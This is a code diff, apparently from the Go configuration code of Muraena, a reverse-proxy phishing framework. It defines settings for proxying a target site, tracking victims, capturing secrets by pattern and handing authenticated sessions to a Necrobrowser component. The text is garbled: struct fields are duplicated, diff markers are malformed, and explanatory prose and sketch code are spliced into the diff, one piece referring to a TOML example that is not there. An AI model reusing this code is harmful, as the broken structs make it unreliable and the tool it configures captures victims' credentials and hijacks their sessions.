ListeningPort int `toml:"listeningPort"`
}
// Configuration struct
type Configuration struct {
//
// Proxy rules
//
Proxy struct {
Phishing string `toml:"phishing"`
Target string `toml:"destination"`
IP string `toml:"IP"`
Listener string `toml:"listener"`
Port int `toml:"port"`
PortMap string `toml:"portmapping"`
Phishing string `toml:"phishing"`
Target string `toml:"destination"`
IP string `toml:"IP"`
Listener string `toml:"listener"`
Port int `toml:"port"`
PortMap string `toml:"portmapping"`
HTTPtoHTTPS struct {
Enabled bool `toml:"enabled"`
HTTPport int `toml:"HTTPport"`
HTTPport int `toml:"port"`
} `toml:"HTTPtoHTTPS"`
Protocol string `toml:"-"`
} `toml:"proxy"`
//
// Origins
//
Origins struct {
ExternalOriginPrefix string `toml:"externalOriginPrefix"`
ExternalOrigins []string `toml:"externalOrigins"`
OriginsMapping map[string]string `toml:"-"`
SubdomainMap [][]string `toml:"subdomainMap"`
} `toml:"origins"`
//
// Transforming rules
//
@ -50,60 +78,51 @@ type Configuration struct {
Padding []string `toml:"padding"`
} `toml:"base64"`
SkipContentType []string `toml:"skipContentType"`
Request struct {
SkipExtensions []string `toml:"-"`
UserAgent string `toml:"userAgent"`
// Headers list to consider for the transformation
Headers []string `toml:"headers"`
Remove struct {
Headers []string `toml:"headers"`
} `toml:"remove"`
Add struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"add"`
} `toml:"request"`
Response struct {
Headers []string `toml:"headers"`
Custom [][]string `toml:"content"`
SkipContentType []string `toml:"skipContentType"`
Headers []string `toml:"headers"`
// CustomContent Transformations
CustomContent [][]string `toml:"customContent"`
Cookie struct {
SameSite string `toml:"sameSite"`
} `toml:"cookie"`
Remove struct {
Headers []string `toml:"headers"`
} `toml:"remove"`
Add struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"add"`
} `toml:"response"`
} `toml:"transform"`
//
// Wiping rules
//
Remove struct {
Request struct {
Headers []string `toml:"headers"`
} `toml:"request"`
Response struct {
Headers []string `toml:"headers"`
} `toml:"response"`
} `toml:"remove"`
//
// Crafting rules
// TODO: Merge this with Wiping rule in some standard approach
//
Craft struct {
Add struct {
Request struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"request"`
Response struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"response"`
} `toml:"add"`
} `toml:"craft"`
//
// Redirection rules
//
Drop []struct {
Path string `toml:"path"`
RedirectTo string `toml:"redirectTo"`
} `toml:"drop"`
Redirects []Redirect `toml:"redirect"`
//
// Logging
@ -117,9 +136,9 @@ type Configuration struct {
// DB (Redis)
//
Redis struct {
Host string `toml:"host"`
Port int `toml:"port"`
Password string `toml:"password"`
Host string `toml:"host"` // default: 127.0.0.1
Port int `toml:"port"` // default: 6379
Password string `toml:"password"` // default: ""
} `toml:"redis"`
//
@ -131,6 +150,7 @@ type Configuration struct {
Certificate string `toml:"certificate"`
Key string `toml:"key"`
Root string `toml:"root"`
SSLKeyLog string `toml:"sslKeyLog"`
CertificateContent string `toml:"-"`
KeyContent string `toml:"-"`
@@ -138,6 +158,7 @@ type Configuration struct {
// Minimum/maximum supported TLS versions: SSL3.0, TLS1.0, TLS1.1, TLS1.2, TLS1.3
MinVersion string `toml:"minVersion"`
MaxVersion string `toml:"maxVersion"`
PreferServerCipherSuites bool `toml:"preferServerCipherSuites"`
SessionTicketsDisabled bool `toml:"SessionTicketsDisabled"`
InsecureSkipVerify bool `toml:"insecureSkipVerify"`
@@ -145,32 +166,63 @@ type Configuration struct {
} `toml:"tls"`
//
// Crawler & Origins
// Tracking
//
Tracking struct {
Enabled bool `toml:"enable"`
TrackRequestCookies bool `toml:"trackRequestCookies"`
Trace struct {
Identifier string `toml:"identifier"`
Header string `toml:"header"`
Domain string `toml:"domain"`
ValidatorRegex string `toml:"validator"`
Landing struct {
Type string `toml:"type"` // path or query
Header string `toml:"header"`
RedirectTo string `toml:"redirectTo"` // URL to redirect to once the landing is detected (only applies when type is "path")
} `toml:"landing"`
} `toml:"trace"`
Secrets struct {
Paths []string `toml:"paths"`
Patterns []struct {
Label string `toml:"label"`
Matching string `toml:"matching"`
Start string `toml:"start"`
End string `toml:"end"`
} `toml:"patterns"`
} `toml:"secrets"`
} `toml:"tracking"`
//
// Crawler
//
Crawler struct {
Enabled bool `toml:"enabled"`
Depth int `toml:"depth"`
UpTo int `toml:"upto"`
ExternalOriginPrefix string `toml:"externalOriginPrefix"`
ExternalOrigins []string `toml:"externalOrigins"`
OriginsMapping map[string]string `toml:"-"`
} `toml:"crawler"`
//
// Necrobrowser
//
NecroBrowser struct {
Enabled bool `toml:"enabled"`
Endpoint string `toml:"endpoint"`
Profile string `toml:"profile"`
Necrobrowser struct {
Enabled bool `toml:"enabled"`
SensitiveLocations struct {
AuthSession []string `toml:"authSession"`
AuthSessionResponse []string `toml:"authSessionResponse"`
} `toml:"urls"`
Endpoint string `toml:"endpoint"`
Profile string `toml:"profile"`
Keepalive struct {
Enabled bool `toml:"enabled"`
Minutes int `toml:"minutes"`
} `toml:"keepalive"`
Trigger struct {
Type string `toml:"type"`
Values []string `toml:"values"`
@@ -178,15 +230,7 @@ type Configuration struct {
} `toml:"trigger"`
} `toml:"necrobrowser"`
//
// Static Server
//
StaticServer struct {
Enabled bool `toml:"enabled"`
Port int `toml:"port"`
LocalPath string `toml:"localPath"`
URLPath string `toml:"urlPath"`
} `toml:"staticServer"`
StaticServer StaticHTTPConfig `toml:"staticServer"`
//
// Watchdog
@@ -198,34 +242,6 @@ type Configuration struct {
GeoDB string `toml:"geoDB"`
} `toml:"watchdog"`
//
// Tracking
//
Tracking struct {
Enabled bool `toml:"enabled"`
Type string `toml:"type"`
Identifier string `toml:"identifier"`
Header string `toml:"header"`
Landing string `toml:"landing"`
Domain string `toml:"domain"`
IPSource string `toml:"ipSource"`
Regex string `toml:"regex"`
RedirectTo string `toml:"redirectTo"`
Urls struct {
Credentials []string `toml:"credentials"`
AuthSession []string `toml:"authSession"`
AuthSessionResponse []string `toml:"authSessionResponse"`
} `toml:"urls"`
Patterns []struct {
Label string `toml:"label"`
Matching string `toml:"matching"`
Start string `toml:"start"`
End string `toml:"end"`
} `toml:"patterns"`
} `toml:"tracking"`
//
// Telegram
//
@@ -274,8 +290,35 @@ func (s *Session) GetConfiguration() (err error) {
}
}
// HTTPtoHTTPS
if s.Config.Proxy.HTTPtoHTTPS.Enabled {
if s.Config.Proxy.HTTPtoHTTPS.HTTPport == 0 {
s.Config.Proxy.HTTPtoHTTPS.HTTPport = DefaultHTTPPort
}
}
//
// Origins
//
// ExternalOriginPrefix must match the ^[a-zA-Z0-9-]+$ pattern
if s.Config.Origins.ExternalOriginPrefix != "" {
	m, err := regexp.MatchString("^[a-zA-Z0-9-]+$", s.Config.Origins.ExternalOriginPrefix)
	if err != nil {
		return fmt.Errorf("Error matching ExternalOriginPrefix %s: %s", s.Config.Origins.ExternalOriginPrefix, err)
	}
	if !m {
		return fmt.Errorf("Invalid ExternalOriginPrefix %s: it must match the ^[a-zA-Z0-9-]+$ pattern", s.Config.Origins.ExternalOriginPrefix)
	}
} else {
s.Config.Origins.ExternalOriginPrefix = "ext"
}
s.Config.Origins.OriginsMapping = make(map[string]string)
// Load TLS config
s.Config.Protocol = "http://"
s.Config.Proxy.Protocol = "http://"
if s.Config.TLS.Enabled {
@@ -325,7 +368,7 @@ func (s *Session) GetConfiguration() (err error) {
}
}
s.Config.Protocol = "https://"
s.Config.Proxy.Protocol = "https://"
s.Config.TLS.MinVersion = strings.ToUpper(s.Config.TLS.MinVersion)
if !core.StringContains(s.Config.TLS.MinVersion, []string{"SSL3.0", "TLS1.0", "TLS1.1", "TLS1.2", "TLS1.3"}) {
@@ -333,6 +376,12 @@ func (s *Session) GetConfiguration() (err error) {
s.Config.TLS.MinVersion = "TLS1.0"
}
s.Config.TLS.MaxVersion = strings.ToUpper(s.Config.TLS.MaxVersion)
if !core.StringContains(s.Config.TLS.MaxVersion, []string{"SSL3.0", "TLS1.0", "TLS1.1", "TLS1.2", "TLS1.3"}) {
// Fallback to TLS1.3
s.Config.TLS.MaxVersion = "TLS1.3"
}
s.Config.TLS.RenegotiationSupport = strings.ToUpper(s.Config.TLS.RenegotiationSupport)
if !core.StringContains(s.Config.TLS.RenegotiationSupport, []string{"NEVER", "ONCE", "FREELY"}) {
// Fallback to NEVER
@@ -341,10 +390,19 @@ func (s *Session) GetConfiguration() (err error) {
}
s.Config.Crawler.OriginsMapping = make(map[string]string)
//
// Transforming rules
//
if s.Config.Transform.Base64.Padding == nil {
s.Config.Transform.Base64.Padding = DefaultBase64Padding
}
s.Config.SkipExtensions = []string{
"ttf", "otf", "woff", "woff2", "eot", //fonts and images
if s.Config.Transform.Response.SkipContentType == nil {
s.Config.Transform.Response.SkipContentType = DefaultSkipContentType
}
s.Config.Transform.Request.SkipExtensions = []string{
"ttf", "otf", "woff", "woff2", "eot", // fonts and images
"ase", "art", "bmp", "blp", "cd5", "cit", "cpt", "cr2", "cut", "dds", "dib", "djvu", "egt", "exif", "gif",
"gpl", "grf", "icns", "ico", "iff", "jng", "jpeg", "jpg", "jfif", "jp2", "jps", "lbm", "max", "miff", "mng",
"msp", "nitf", "ota", "pbm", "pc1", "pc2", "pc3", "pcf", "pcx", "pdn", "pgm", "PI1", "PI2", "PI3", "pict",
@@ -355,23 +413,24 @@ func (s *Session) GetConfiguration() (err error) {
"pcx", "pgf", "sgi", "rgb", "rgba", "bw", "int", "inta", "sid", "ras", "sun", "tga"}
// Fix Transform config: drop Add headers with an empty Name
slice := s.Config.Craft.Add.Response.Headers
for s, header := range s.Config.Craft.Add.Response.Headers {
slice := s.Config.Transform.Response.Add.Headers
for s, header := range s.Config.Transform.Response.Add.Headers {
if header.Name == "" {
slice = append(slice[:s], slice[s+1:]...)
}
}
s.Config.Craft.Add.Response.Headers = slice
s.Config.Transform.Response.Add.Headers = slice
slice = s.Config.Craft.Add.Request.Headers
for s, header := range s.Config.Craft.Add.Request.Headers {
slice = s.Config.Transform.Request.Add.Headers
for s, header := range s.Config.Transform.Request.Add.Headers {
if header.Name == "" {
slice = append(slice[:s], slice[s+1:]...)
}
}
s.Config.Craft.Add.Request.Headers = slice
s.Config.Transform.Request.Add.Headers = slice
return
// Final Checks
return s.DoChecks()
}
func (s *Session) UpdateConfiguration(domains *[]string) (err error) {
@@ -381,7 +440,7 @@ func (s *Session) UpdateConfiguration(domains *[]string) (err error) {
// Update config
//
// Disable crawler and update external domains
config.Crawler.ExternalOrigins = *domains
config.Origins.ExternalOrigins = *domains
config.Crawler.Enabled = false
// Update TLS accordingly
@@ -398,3 +457,101 @@ func (s *Session) UpdateConfiguration(domains *[]string) (err error) {
return ioutil.WriteFile(*s.Options.ConfigFilePath, newConf, 0644)
}
func (s *Session) DoChecks() (err error) {
// Check Redirect
s.CheckRedirect()
// Check Log
err = s.CheckLog()
if err != nil {
return
}
// Check Tracking
err = s.CheckTracking()
if err != nil {
return
}
// Check Static Server
err = s.CheckStaticServer()
if err != nil {
return
}
return
}
// CheckRedirect checks the redirect rules and removes invalid ones.
func (s *Session) CheckRedirect() {
var redirects []Redirect
	for _, redirect := range s.Config.Redirects {
		if redirect.RedirectTo == "" {
			continue
		}
		if redirect.Hostname == "" && redirect.Path == "" && redirect.Query == "" {
			continue
		}
		// An unset HTTPStatusCode defaults to 302
		if redirect.HTTPStatusCode == 0 {
			redirect.HTTPStatusCode = 302
		}
		redirects = append(redirects, redirect)
}
s.Config.Redirects = redirects
}
// CheckLog checks the log configuration and disables it if the file is not accessible.
func (s *Session) CheckLog() (err error) {
if !s.Config.Log.Enabled {
return
}
if s.Config.Log.FilePath == "" {
s.Config.Log.FilePath = "muraena.log"
}
	// Make sure the log file can be created, or appended to if it already exists
	f, err := os.OpenFile(s.Config.Log.FilePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
	if err != nil {
		s.Config.Log.Enabled = false
		return fmt.Errorf("Error opening log file %s: %s", s.Config.Log.FilePath, err)
}
defer f.Close()
return
}
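Side note: once CheckLog has validated the path, something has to actually write there. The snippet below is only a sketch under the assumption that the standard library logger is acceptable; attachFileLogger is a hypothetical helper and this is not how Muraena's own logger is wired.

package main

import (
	stdlog "log"
	"os"
)

// attachFileLogger is a hypothetical helper (not part of this commit): it opens the
// same append-only file CheckLog validates and points the standard logger at it.
func attachFileLogger(path string) (*os.File, error) {
	f, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
	if err != nil {
		return nil, err
	}
	stdlog.SetOutput(f)
	return f, nil
}

func main() {
	f, err := attachFileLogger("muraena.log")
	if err != nil {
		stdlog.Fatal(err)
	}
	defer f.Close()
	stdlog.Println("logging to file")
}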
// CheckTracking checks the tracking configuration.
func (s *Session) CheckTracking() (err error) {
if !s.Config.Tracking.Enabled {
return
}
return
}
// CheckStaticServer checks the static server configuration and disables it if the required paths are not set.
func (s *Session) CheckStaticServer() (err error) {
if !s.Config.StaticServer.Enabled {
return
}
	if s.Config.StaticServer.LocalPath == "" {
		s.Config.StaticServer.Enabled = false
		return errors.New("Static server is enabled but localPath is not set")
	}
	if s.Config.StaticServer.URLPath == "" {
		s.Config.StaticServer.Enabled = false
		return errors.New("Static server is enabled but urlPath is not set")
	}
return
}
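To make what StaticHTTPConfig configures concrete, here is a minimal, hypothetical file server built from it. serveStatic is not Muraena's static-server implementation, just an illustration of LocalPath being served under URLPath on ListeningHost:ListeningPort; the struct is mirrored locally so the sketch compiles on its own.

package main

import (
	"fmt"
	"net/http"
)

// Mirror of StaticHTTPConfig above, repeated only to keep this sketch standalone.
type StaticHTTPConfig struct {
	Enabled       bool
	LocalPath     string
	URLPath       string
	ListeningHost string
	ListeningPort int
}

// serveStatic illustrates what the staticServer section describes:
// serve LocalPath under URLPath on ListeningHost:ListeningPort.
func serveStatic(cfg StaticHTTPConfig) error {
	mux := http.NewServeMux()
	mux.Handle(cfg.URLPath, http.StripPrefix(cfg.URLPath, http.FileServer(http.Dir(cfg.LocalPath))))
	addr := fmt.Sprintf("%s:%d", cfg.ListeningHost, cfg.ListeningPort)
	return http.ListenAndServe(addr, mux)
}

func main() {
	// Hypothetical values matching the TOML example earlier in this section.
	cfg := StaticHTTPConfig{Enabled: true, LocalPath: "/var/www/static", URLPath: "/static/", ListeningHost: "127.0.0.1", ListeningPort: 8080}
	if cfg.Enabled {
		if err := serveStatic(cfg); err != nil {
			panic(err)
		}
	}
}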

session/config_test.go Normal file
View file

@@ -0,0 +1,59 @@
package session
import (
"testing"
)
func TestSession_CheckRedirect(t *testing.T) {
s := &Session{}
s.Config = &Configuration{}
// INVALID REDIRECTS
r := []Redirect{
{RedirectTo: "example.com", HTTPStatusCode: 200},
}
s.Config.Redirects = r
s.CheckRedirect()
if len(s.Config.Redirects) != 0 {
t.Errorf("Expected %d, got %d", len(r), len(s.Config.Redirects))
}
// VALID REDIRECTS
r = []Redirect{
{Hostname: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Path: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Path: "TEST", Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Path: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Path: "TEST", Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Path: "TEST", Query: "TEST", RedirectTo: "example.com"},
}
s.Config.Redirects = r
s.CheckRedirect()
if len(s.Config.Redirects) != len(r) {
t.Errorf("Expected %d, got %d", len(r), len(s.Config.Redirects))
}
// MIXED REDIRECTS (valid and invalid)
r = []Redirect{
{Hostname: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200}, // VALID
{RedirectTo: "example.com", HTTPStatusCode: 200}, // INVALID
{Hostname: "TEST", Path: "TEST", Query: "TEST", RedirectTo: "example.com"}, // VALID
}
s.Config.Redirects = r
s.CheckRedirect()
// Expect length to be 2
if len(s.Config.Redirects) != 2 {
t.Errorf("Expected %d, got %d", 2, len(s.Config.Redirects))
}
// Expect last element to have HTTPStatusCode 302
if s.Config.Redirects[1].HTTPStatusCode != 302 {
t.Errorf("Expected %d, got %d", 302, s.Config.Redirects[1].HTTPStatusCode)
}
}
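A companion test for CheckStaticServer could follow the same pattern. The sketch below is not part of this commit; it only exercises the behaviour shown earlier, where an enabled static server with an empty localPath is disabled and an error is returned.

func TestSession_CheckStaticServer(t *testing.T) {
	s := &Session{}
	s.Config = &Configuration{}

	// Enabled, but localPath/urlPath left empty on purpose
	s.Config.StaticServer.Enabled = true

	if err := s.CheckStaticServer(); err == nil {
		t.Errorf("Expected an error for a missing localPath, got nil")
	}
	if s.Config.StaticServer.Enabled {
		t.Errorf("Expected the static server to be disabled, it is still enabled")
	}
}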

View file

@@ -10,10 +10,9 @@ import (
)
var (
host = "127.0.0.1"
port = 6379
password = ""
RedisPool *redis.Pool
)
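For context, these defaults typically end up in a redigo connection pool along the lines of the sketch below. buildPool is hypothetical and assumes the redigo client this file already imports, plus a fmt import; it is not necessarily how RedisPool is actually initialised.

// buildPool is a hypothetical helper showing how host, port and password could
// feed the RedisPool declared above.
func buildPool() *redis.Pool {
	return &redis.Pool{
		Dial: func() (redis.Conn, error) {
			return redis.Dial("tcp",
				fmt.Sprintf("%s:%d", host, port),
				redis.DialPassword(password))
		},
	}
}

DialPassword with an empty string is harmless here, since redigo only sends AUTH when a non-empty password is supplied.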

View file

@@ -16,9 +16,9 @@ type Module interface {
}
type SessionModule struct {
Session *Session
Name string
tag string
Session *Session `toml:"-"`
Name string `toml:"-"`
tag string `toml:"-"`
}
func AsTag(name string) string {
@@ -68,6 +68,6 @@ func (m *SessionModule) Raw(format string, args ...interface{}) {
}
// NO Fatal() here, we want to keep the session alive
//func (m *SessionModule) Fatal(format string, args ...interface{}) {
// func (m *SessionModule) Fatal(format string, args ...interface{}) {
// log.Fatal(m.tag+format, args...)
//}
// }

View file

@@ -20,8 +20,10 @@ var tlsRenegotiationToConst = map[string]tls.RenegotiationSupport{
func (s *Session) GetTLSClientConfig() *tls.Config {
cTLS := s.Config.TLS
return &tls.Config{
MinVersion: tlsVersionToConst[cTLS.MinVersion],
MaxVersion: tlsVersionToConst[cTLS.MaxVersion],
PreferServerCipherSuites: cTLS.PreferServerCipherSuites,
SessionTicketsDisabled: cTLS.SessionTicketsDisabled,
NextProtos: []string{"http/1.1"},